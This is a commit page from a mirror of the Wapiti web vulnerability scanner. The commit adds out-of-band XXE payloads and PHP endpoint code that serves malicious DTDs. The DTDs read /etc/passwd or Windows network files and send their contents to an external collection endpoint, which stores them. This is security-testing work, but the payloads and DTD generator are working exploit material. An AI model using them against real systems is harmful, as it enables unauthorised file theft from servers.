Cybersec
/
wapiti
mirror of https://github.com/wapiti-scanner/wapiti.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improve XXE attack module: add two payloads not using PHP filters (tested against PenTesterLab XXE VM) + generate medium level vulnerability if the DTD was reached but no data was received.

This commit is contained in:
devloop 2022-02-09 16:09:22 +01:00
parent 3b5f07c0e2
commit 2b80c2717e
5 changed files with 79 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
endpoint/get_xxe.php
View File

@ -38,6 +38,12 @@ if (strlen($session_id) ==6 && ctype_alnum($session_id))
case 2:
$payload = "windows";
break;
case 3:
$payload = "javalin";
break;
case 4:
$payload = "javawin";
break;
default:
$payload = "unknown";
}

32
endpoint/xxe_dtd.php
View File

@ -14,26 +14,48 @@ if (!ctype_xdigit($hex_param)) exit();
include("functions.php");
$num = -1;
$payload_num = -1;
// We must use small files because big one won't be sent
switch($payload) {
case "windows":
$filename = "c:/windows/system32/drivers/etc/networks";
$num = 2;
$payload_num = 2;
break;
case "linux":
$filename = "/etc/passwd";
$num = 1;
$payload_num = 1;
break;
case "linux2":
$filename = "/etc/networks";
$num = 0;
$payload_num = 0;
break;
case "javalin":
$filename = "/etc/passwd";
$payload_num = 3;
break;
case "javawin":
$filename = "c:/windows/system32/drivers/etc/networks";
$payload_num = 4;
break;
}
$time = time();
$directory = "./xxe_data/$session_id/$path_id/$hex_param/";
if (!is_dir($directory)) mkdir($directory, 0777, true);
// Create an empty file so we can know if the DTD was queried
touch("$directory/$time-$payload_num-$ip.txt");
if (substr($payload, 0, 4) === "java") {
$response = '<!ENTITY % payload SYSTEM "file://'.$filename.'">
<!ENTITY % intern "<!ENTITY trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$payload_num.'/%payload;\'>">
%intern;';
} else {
$response = '<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource='.$filename.'">
<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$num.'/%payload;\'>">
<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$payload_num.'/%payload;\'>">
';
}
header("Content-Type: text/xml");
echo $response;
?>

9
endpoint/xxe_store.php
View File

@ -15,10 +15,15 @@ if (!ctype_digit($path_id)) exit();
if (!ctype_xdigit($hex_param)) exit();
if (!ctype_digit($payload_num)) exit();
if (!strlen($data)) exit();
$data = base64_decode($data);
if ($payload_num < 3) {
// those are PHP payloads using a filter to encode the data in base64
$data = base64_decode($data);
}
$time = time();
$directory = "./xxe_data/$session_id/$path_id/$hex_param/";
mkdir($directory, 0777, true);
if (!is_dir($directory)) mkdir($directory, 0777, true);
file_put_contents("$directory/$time-$payload_num-$ip.txt", $data, FILE_APPEND);
?>

46
wapitiCore/attack/mod_xxe.py
View File

@ -362,17 +362,24 @@ class ModuleXxe(Attack):
parameter
)
more_infos = _(
"The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
"Received data can be seen at {3}."
).format(
request_size,
request_date,
request_ip,
request_url
)
if not request_size:
# Overwrite the message as the full exploit chain failed
vuln_message = _(
"The target reached the DTD file on the endpoint but the exploitation didn't succeed."
)
else:
# Exploitation succeed, we have some data
more_infos = _(
"The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
"Received data can be seen at {3}."
).format(
request_size,
request_date,
request_ip,
request_url
)
vuln_message += "\n" + more_infos
vuln_message += "\n" + more_infos
# placeholder if shit happens
payload = (
@ -417,7 +424,14 @@ class ModuleXxe(Attack):
)
mutated_request, __, __, __ = next(mutator.mutate(original_request))
await self.add_vuln_high(
if request_size:
add_vuln_method = self.add_vuln_high
log_method = log_red
else:
add_vuln_method = self.add_vuln_medium
log_method = log_orange
await add_vuln_method(
request_id=original_request.path_id,
category=NAME,
request=mutated_request,
@ -426,8 +440,8 @@ class ModuleXxe(Attack):
wstg=WSTG_CODE
)
log_red("---")
log_red(vuln_message)
log_red(Messages.MSG_EVIL_REQUEST)
log_red(mutated_request.http_repr())
log_red("---")
log_method("---")
log_method(vuln_message)
log_method(Messages.MSG_EVIL_REQUEST)
log_method(mutated_request.http_repr())
log_method("---")

9
wapitiCore/data/attacks/xxePayloads.ini
View File

@ -15,6 +15,15 @@ rules = link-local
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/system32/drivers/etc/networks">]><foo>&xxe;</foo>
rules = network name/network number mappings
[out_of_band_linux_no_php]
payload = <?xml version="1.0"?><!DOCTYPE foo SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/javalin.dtd"><foo>&trick;</foo>
rules = root:x:0:
root:*:0:0
[out_of_band_windows_no_php]
payload = <?xml version="1.0"?><!DOCTYPE foo SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/javawin.dtd"><foo>&trick;</foo>
rules = network name/network number mappings
[out_of_band_linux_passwd]
payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
rules = root:x:0: